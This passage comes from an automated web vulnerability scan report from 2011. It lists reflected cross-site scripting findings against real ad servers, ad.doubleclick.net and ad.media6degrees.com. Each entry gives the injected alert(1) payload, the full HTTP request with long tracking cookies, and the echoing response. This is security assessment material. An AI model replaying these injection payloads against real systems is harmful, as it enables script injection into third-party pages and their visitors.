lick%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

1.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/uk.reuters/news/lifestyle/article

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eaaa'%3balert(1)//62bc3773dd1 was submitted in the type parameter. This input was echoed as 9eaaa';alert(1)//62bc3773dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/uk.reuters/news/lifestyle/article;type=9eaaa'%3balert(1)//62bc3773dd1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:35:57 GMT
Expires: Mon, 14 Feb 2011 01:35:57 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/a;44306;0-0;0;46373374;39648-768/768;0/0/0;;~okv=;type=9eaaa';alert(1)//62bc3773dd1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/wpni.politics/inlinead

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d2cc'-alert(1)-'80eb2a6b3f6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/wpni.politics/inlinead;ad=5d2cc'-alert(1)-'80eb2a6b3f6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:38:09 GMT
Expires: Mon, 14 Feb 2011 01:43:09 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/u;236054673;0-0;0;20580498;255-0/0;40598846/40616633/1;;~okv=;ad=5d2cc'-alert(1)-'80eb2a6b3f6;~aopt=2/0/a8/0;~sscs=%3fhttp://www.c-span.org/Series/Washington-Journal/">
...[SNIP]...

1.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.media6degrees.com
Path:	/adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdefb"-alert(1)-"6a122e04d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12707lxzt12707lxzt12707l; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122m0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl0axzm00000000004esx7120104tej49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r073ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct; adh="1lf17qo16033e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv274ys01x1709070v214; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=4330ojdlggtq20000000b170911gvlggtq20000000b17090yujlginvd0000000817080jv3lginvd0000000817080e0flggrmr0000000c17090x1blebnns1wj3q01411000yielginvd0000000817080yiflginvd0000000817080oj6lggtq20000000b17090e08lggtq20000000b170910qflginvq0000000717070e0nlgevbm0000000e17090w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000b17090j4ilew2e20000001r17090khalggtq20000000b17091196lfzx0l0000001417091195lg7rdq0000000v17090jillebnns1wj3q01411001194lg3y5y0000001117090z14lggtq20000000b17090zgdlggtq20000000b17090faalggtq20000000b17090z13lgio080000000217021193lgiiin0000000917091192lg5l2h0000001017090jprlginvd0000000817080w2klggtq20000000b17090yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001t17090mmnlebnns1wj3q01411000xwhlggtq20000000b17091004lginvd0000000817080z02lggtq20000000b17090kbzlggtq20000000b17090eh5lf17qf0000001p17090kkclggtq20000000b170906bylemlne0000001v17090df5lgcqt50000000j1709111xlggtq20000000b17090mn2lginvd0000000817080mn1lginvd0000000817080swvlggtq20000000b1709100plggtq20000000b17090im3lgcqt50000000j17090yzglginxj0000000517050b6mlf17qk0000001o17090y63lg93og0000000o17090xvslebnns1wj3q01411000o5alggtq20000000b17090yyxlginvu0000000617060yywlginzk0000000317030x1jlebnns1wj3q01411000xwclginvd0000000817080o4plginvd0000000817080yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000b17090yyelginyj0000000417040fullf8gij0000001l170910f6lg1nei00000013170900c9lfk1rn0000001i17090y7blg94wv0000000m17090jsalggtq20000000b170906pklginvd0000000817080cajlfk1rn0000001i17090p7vlebnns1xgc001b120010tylg60ji0000000w170910ellg1nei07gla00h120010eklggtq20000000b17090xuklebnns2219101x170911k3lginvd00000008170810telg60j60000000y170910e9lg1nei0000001317090xtblggtq20000000b170910e2lggtq20000000b17090mivlgismk0000000117010yw4lggtq20000000b170910e4lginvd00000008170810e5lg1nei00000013170910rdlg1vir087mk01217090xt3lggtq20000000b17090mzklgcsh70000000h17090agalggtq20000000b17090agblggtq20000000b17090mzqlgcsgy0000000i17090loxlginvd00000008170807gmlebnns1wj3q01411000kfalginvd0000000817080xthlebnns1xgc001b12000xtflggtq20000000b17090za2lginvd0000000817080za1lginvd00000008170807gqlggtq20000000b17090ovwlginvd0000000817080lw4lginvd0000000817080fuqlegh2b0000001w17090lw3lggtq20000000b17090l24lginvd0000000817080mz1lebnns1wj3q01411000l25lggtq20000000b170907vglfk1rn0tn5601i17090jk7lebnns1wj3q01411000cbnlfk1rn0tn5601i17090e11lggwth0000000a1709; sglst=21k0s8dtlggrmr01w8m00c1709070c20c8kmlggrmr01w8m00c1709070c20cavtlggrmr0056q00c1709070c20c82hlebnns1ucve00z10000600200avjlggrmr01w8m00c1709070c20c3kilggrmr01w8m00c1709070c20calhlggrmr01w8m00c1709070c20c9bslggrmr01w8m00c1709070c20cab4lebnns2707l01x1709070v21481zlggrmr0056q00c1709070c20c8gxlggrmr0056q00c1709070c20c81ylginvd00000008170807082088gwlginvd0000000817080708208aoklggrmr0056q00c1709070c20caollginvd0000000817080708208b07lggwth01r1w00a1709070a20a7inlginvd00000008170807082088nclginvd0000000817080708208b05lggrmr01w8m00c1709070c20cal1lggrmr01w8m00c1709070c20cbbhlggrmr01w8m00c1709070c20c8wylginvd0000000817080708208b0clfjpei0yygv01j1709070v2148wxlggrmr0056q00c1709070c20c72slggtq201ywi00b1709070b20bahhlginvd00000008170807082088nblggrmr0056q00c1709070c20cahilggrmr0056q00c1709070c20c7gdlgcqt5061tf00j1709070j20jb08lfjpei0yygv01b1700070020040ulggrmr01w8m00c1709070c20caprlggrmr01w8m00c1709070c20c5l4lgcqt5061tf00j1709070j20jaanlebnns1xg0o00o120007002008aelggrmr0056q00c1709070c20c61hlggrmr01w8m00c1709070c20c5b0lf17qo0000001n1709070v214ag2leqh191sblb01u1709070v2143thlggrmr01w8m00c1709070c20c8c9lggrmr0056q00c1709070c20c9z4lggrmr01w8m00c1709070c20cacjlggrmr01w8m00c1709070c20cb1alfjpei0yygv01j1709070v2149mmlggrmr0056q00c1709070c20cb0nlggrmr01w8m00c1709070c20cb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00c1709070c20c0tllegh2b22bk901w1709070v2149cblggrmr0056q00c1709070c20c8bglginvd00000008170807082084wmlggrmr01w8m00c1709070c20c5q8lebnns1ucve00k10000600200acelggrmr01w8m00c1709070c20c45mlfdxmc0000001k1709070v214bhdlginvd0000000817080708208

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdw3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgs01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: rdrlst=43311gvlggtq20000000c18010ojdlggtq20000000c18010yujlginvd0000000918010x1blebnns1wj3q01411000e0flggrmr0000000d18010jv3lginvd0000000918010yielginvd0000000918010yiflginvd0000000918010oj6lggtq20000000c18010e08lggtq20000000c180110qflginvq0000000818010w3clebnns1wj3q01411000e0nlgevbm0000000f18010jv6lebnns1wj3q01411000jv5lggtq20000000c18010j4ilew2e20000001s18010khalggtq20000000c18011196lfzx0l0000001518011195lg7rdq0000000w18010jillebnns1wj3q01411001194lg3y5y0000001218010z14lggtq20000000c18010zgdlggtq20000000c18010faalggtq20000000c18010z13lgio080000000318011193lgiiin0000000a18011192lg5l2h0000001118010jprlginvd0000000918010w2klggtq20000000c18010yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001u18010mmnlebnns1wj3q01411000xwhlggtq20000000c18011004lginvd0000000918010z02lggtq20000000c18010kbzlggtq20000000c18010kkclggtq20000000c18010eh5lf17qf0000001q180106bylemlne0000001w18010df5lgcqt50000000k1801111xlggtq20000000c18010mn2lginvd0000000918010mn1lginvd0000000918010swvlggtq20000000c1801100plggtq20000000c18010im3lgcqt50000000k18010yzglginxj0000000618010b6mlf17qk0000001p18010y63lg93og0000000p18010xvslebnns1wj3q01411000o5alggtq20000000c18010yyxlginvu0000000718010yywlginzk0000000418010x1jlebnns1wj3q01411000xwclginvd0000000918010o4plginvd0000000918010yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000c18010yyelginyj0000000518010fullf8gij0000001m180110f6lg1nei00000014180100c9lfk1rn0000001j18010y7blg94wv0000000n18010jsalggtq20000000c180106pklginvd0000000918010cajlfk1rn0000001j18010p7vlebnns1xgc001b120010tylg60ji0000000x180110ellg1nei07gla00h120010eklggtq20000000c18010xuklebnns2219101y180111k3lginvd00000009180110telg60j60000000z180110e9lg1nei0000001418010xtblggtq20000000c180110e2lggtq20000000c18010mivlgismk0000000218010yw4lggtq20000000c180110e4lginvd00000009180110e5lg1nei00000014180110rdlg1vir087mk01318010xt3lggtq20000000c18010mzklgcsh70000000i18010agalggtq20000000c18010agblggtq20000000c18010mzqlgcsgy0000000j18010loxlginvd00000009180107gmlebnns1wj3q01411000kfalginvd0000000918010xthlebnns1xgc001b12000xtflggtq20000000c18010za2lginvd0000000918010za1lginvd0000000918010ovwlginvd00000009180107gqlggtq20000000c18010lw4lginvd0000000918010fuqlegh2b0000001x18010lw3lggtq20000000c18010mz1lebnns1wj3q01411000l24lginvd0000000918010l25lggtq20000000c180107vglfk1rn0tn5601j18010jk7lebnns1wj3q01411000cbnlfk1rn0tn5601j18010e11lggwth0000000b1801; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: sglst=21l0s8dtlggrmr01w8m00d1801080120d8kmlggrmr01w8m00d1801080120davtlggrmr0056q00d1801080120d82hlebnns1ucve00z10000600200avjlggrmr01w8m00d1801080120d3kilggrmr01w8m00d1801080120dalhlggrmr01w8m00d1801080120d9bslggrmr01w8m00d1801080120dab4lebnns2707l01y1801080121581zlggrmr0056q00d1801080120d8gxlggrmr0056q00d1801080120d81ylginvd00000009180108012098gwlginvd0000000918010801209aoklggrmr0056q00d1801080120daollginvd0000000918010801209b07lggwth01r1w00b1801080120b8nclginvd00000009180108012097inlginvd0000000918010801209b05lggrmr01w8m00d1801080120dal1lggrmr01w8m00d1801080120d8wylginvd0000000918010801209bbhlggrmr01w8m00d1801080120d8wxlggrmr0056q00d1801080120db0clfjpei0yygv01k1801080121572slggtq2049ei00c1801080120cahhlginvd00000009180108012098nblggrmr0056q00d1801080120dahilggrmr0056q00d1801080120d7gdlgcqt508cbf00k1801080120kb08lfjpei0yygv01b1700070020040ulggrmr01w8m00d1801080120daprlggrmr01w8m00d1801080120d5l4lgcqt508cbf00k1801080120kaanlebnns1xg0o00o120007002008aelggrmr0056q00d1801080120d61hlggrmr01w8m00d1801080120d5b0lf17qo0000001o18010801215ag2leqh191um3b01v180108012153thlggrmr01w8m00d1801080120d8c9lggrmr0056q00d1801080120d9z4lggrmr01w8m00d1801080120dacjlggrmr01w8m00d1801080120db1alfjpei0yygv01k180108012159mmlggrmr0056q00d1801080120db0nlggrmr01w8m00d1801080120db0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00d1801080120d4zqlgl34k00000001180108012019cblggrmr0056q00d1801080120d0tllegh2b24m2901x180108012155q8lebnns1ucve00k100006002004wmlggrmr01w8m00d1801080120d8bglginvd0000000918010801209acelggrmr01w8m00d1801080120d45mlfdxmc0000001l18010801215bhdlginvd0000000918010801209; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 830

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1";
</script>
...[SNIP]...

1.47. http://ad.media6degrees.com/adserv/cs [tId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.media6degrees.com
Path:	/adserv/cs

Issue detail

The value of the tId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37aa2"-alert(1)-"5ae84f10ba7 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12707lxzt12707lxzt12707l; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122m0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl0axzm00000000004esx7120104tej49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r073ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct; adh="1lf17qo16033e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv274ys01x1709070v214; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=4330ojdlggtq20000000b170911gvlggtq20000000b17090yujlginvd0000000817080jv3lginvd0000000817080e0flggrmr0000000c17090x1blebnns1wj3q01411000yielginvd0000000817080yiflginvd0000000817080oj6lggtq20000000b17090e08lggtq20000000b170910qflginvq0000000717070e0nlgevbm0000000e17090w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000b17090j4ilew2e20000001r17090khalggtq20000000b17091196lfzx0l0000001417091195lg7rdq0000000v17090jillebnns1wj3q01411001194lg3y5y0000001117090z14lggtq20000000b17090zgdlggtq20000000b17090faalggtq20000000b17090z13lgio080000000217021193lgiiin0000000917091192lg5l2h0000001017090jprlginvd0000000817080w2klggtq20000000b17090yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001t17090mmnlebnns1wj3q01411000xwhlggtq20000000b17091004lginvd0000000817080z02lggtq20000000b17090kbzlggtq20000000b17090eh5lf17qf0000001p17090kkclggtq20000000b170906bylemlne0000001v17090df5lgcqt50000000j1709111xlggtq20000000b17090mn2lginvd0000000817080mn1lginvd0000000817080swvlggtq20000000b1709100plggtq20000000b17090im3lgcqt50000000j17090yzglginxj00000